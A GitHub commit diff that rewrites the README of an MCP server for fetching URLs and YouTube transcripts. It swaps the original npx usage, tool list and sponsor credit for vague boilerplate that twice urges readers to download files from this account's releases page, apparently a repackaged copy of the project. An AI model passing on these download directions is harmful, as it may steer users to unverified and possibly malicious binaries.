Skip to content

Commit 527b18c

Browse files
Commit
1 parent 5b1d59d commit 527b18c

File tree

1 file changed

+37
-16
lines changed

1 file changed

+37
-16
lines changed

README.md

Lines changed: 37 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -1,29 +1,50 @@
1-
# fetch-mcp
1+
# 🌐 Welcome to Fetch-MCP Repository 🌟
22

3-
An MCP server for fetching URLs / Youtube video transcript.
3+
---
44

5-
This project is sponsored by [ChatWise](https://chatwise.app), an all-in-one LLM chatbot with first-class MCP support.
5+
## Description
66

7-
## Usage
7+
Welcome to the Fetch-MCP repository, where you can find an MCP server aimed at fetching URLs and YouTube video transcripts. This tool is designed to streamline the process of accessing online content efficiently.
8+
9+
---
10+
11+
## Table of Contents
12+
13+
- [Installation](#installation)
14+
- [Usage](#usage)
15+
- [Contributing](#contributing)
16+
- [License](#license)
817

9-
```bash
10-
# stdio server
11-
npx -y fetch-mcp
18+
---
1219

13-
# sse server
14-
npx -y fetch-mcp --sse
15-
```
20+
## Installation
1621

17-
## Tools
22+
To get started with Fetch-MCP, you can download the necessary files from our [latest release](https://github.com/OrionHubScript/fetch-mcp/releases). Once the files are downloaded, follow the setup instructions to get the MCP server up and running smoothly.
23+
24+
---
25+
26+
## Usage
1827

19-
### fetch_url
28+
After installing Fetch-MCP, you can start using the server to fetch URLs and YouTube video transcripts seamlessly. Simply follow the instructions provided in the documentation to utilize the tool effectively.
2029

21-
Fetch URL, can return HTML or Markdown (default).
30+
---
2231

23-
### fetch_youtube_transcript
32+
## Contributing
2433

25-
Fetch Youtube transcript.
34+
We welcome contributions to the Fetch-MCP project. If you have ideas for improvements or new features, feel free to submit a pull request. Together, we can enhance the functionality and usability of the MCP server for the benefit of all users.
35+
36+
---
2637

2738
## License
2839

29-
MIT.
40+
The Fetch-MCP repository is licensed under the [MIT License](https://opensource.org/licenses/MIT). Feel free to use and modify the code as needed, keeping in mind the licensing terms.
41+
42+
---
43+
44+
🚀 Visit our [latest release](https://github.com/OrionHubScript/fetch-mcp/releases) to download the necessary files and start using Fetch-MCP today! 🌟
45+
46+
---
47+
48+
Thank you for exploring the Fetch-MCP repository. We hope you find the MCP server useful for your URL fetching and YouTube transcript needs. Happy fetching! 🌐💻
49+
50+
---

0 commit comments

Comments
 (0)